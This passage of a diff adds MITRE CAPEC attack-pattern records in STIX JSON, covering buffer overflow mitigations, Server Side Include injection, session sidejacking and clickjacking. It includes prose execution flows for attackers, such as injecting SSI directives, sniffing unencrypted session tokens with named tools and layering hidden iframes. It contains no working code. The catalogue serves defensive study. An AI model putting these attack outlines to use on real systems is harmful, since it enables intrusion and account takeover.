+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking.", + "id": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cedea035-6835-4307-a59b-acd58ec23ecd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use secure functions not vulnerable to buffer overflow.", + "id": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--394fe1bb-8b4d-4638-b4e8-2a5719efe438", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "id": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--774c708f-2480-4cee-8e04-c42d603760e8", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. 
Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d04362e0-439c-40a1-bfa2-cbddb7b33bbd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use OS-level preventative functionality. 
Not a complete solution.", + "id": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aae34f4-823f-43ac-90e9-fa33251c4236", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.", + "id": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f190864-e6a8-45f8-af58-75124f4f4914", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ed4ed4-15a0-4d2a-b38c-482bf5e682a5", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.", + "external_references": [ + { + "external_id": "CAPEC-101", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/101.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "SSI Injection", + "external_id": "36", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SSI-Injection" + }, + { + "description": "Server-Side Includes (SSI) Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-610", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.html" + } + ], + "id": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Server Side Include (SSI) Injection", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the \"Options Includes\" directive enabled.\n Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.\n When these logs are eventually reviewed, the server parses the SSI directives and executes them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine applicability: The adversary determines whether server side includes are enabled on the target web server.

  2. Techniques
    Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.
    Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it.

Experiment

  1. Find Injection Point: Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

Exploit

  1. Inject SSI: Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A web server that supports server side includes and has them enabled", + "User controllable input that can carry include directives to the web server" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them", + "id": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3428ab3f-34a5-436a-98f2-9be0a5397f94", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64214f54-8438-43c3-8052-8927af7d98bc", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive", + "id": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c9bb040-3574-49f1-bec3-723afe52faa1", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Server Side Includes must be enabled only if there is a strong business reason to do so. 
Every additional component enabled on the web server increases the attack surface as well as administrative overhead", + "id": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c92c5203-00ee-424c-a58b-d36d36695f03", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. 
Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.", + "external_references": [ + { + "external_id": "CAPEC-102", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/102.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-523", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/523.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-614", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/614.html" + } + ], + "id": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Session Sidejacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. 
The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Unprotected Session Token Transfer: The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.

  2. Techniques
    The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

Experiment

  1. Capture session token: The attacker uses sniffing tools to capture a session token from traffic.

  2. Insert captured session token: The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker and the victim are both using the same WiFi network.", + "The victim has an active session with a target system.", + "The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)", + "The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \"rings home\" asynchronously using the session token" + ], + "x_capec_resources_required": [ + "A packet sniffing tool, such as wireshark, can be used to capture session information." + ], + "x_capec_skills_required": { + "Low": "Easy to use tools exist to automate this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. 
It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b42f764-6aa4-4c32-a752-c814178db08c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Modify the session token with each transmission and protect it with cryptography. 
Add the idea of request sequencing that gives the server an ability to detect replay attacks.", + "id": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66376c3d-cedd-4a2e-9fd6-1737edda9a5e", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system.", + "external_references": [ + { + "external_id": "CAPEC-103", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/103.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Clickjacking", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Clickjacking" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-619", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.html" + } + ], + "id": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Clickjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "\n A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.\n In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. 
Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft a clickjacking page: The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page

  2. Techniques
    The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged cross-frame scripting to craft a malicious clickjacking page

Exploit

  1. Adversary lures victim to clickjacking page: Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.

  2. Techniques
    Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Lure the victim to the malicious site through a cross-site scripting attack.
  3. Trick victim into interacting with the clickjacking page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

  4. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408" + ], + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client", + "The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.", + "The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)", + "The victim has an active session with the target system.", + "The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site are not trivial tasks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9b7917-b0c4-4461-93c3-7c9623a1eca8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Turn off JavaScript, Flash and disable CSS.", + "id": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c711dc9-c190-43bc-a5e0-02855f1b48e5", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--591f6f0b-24c7-4594-9450-5a3ca2a41ad7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. 
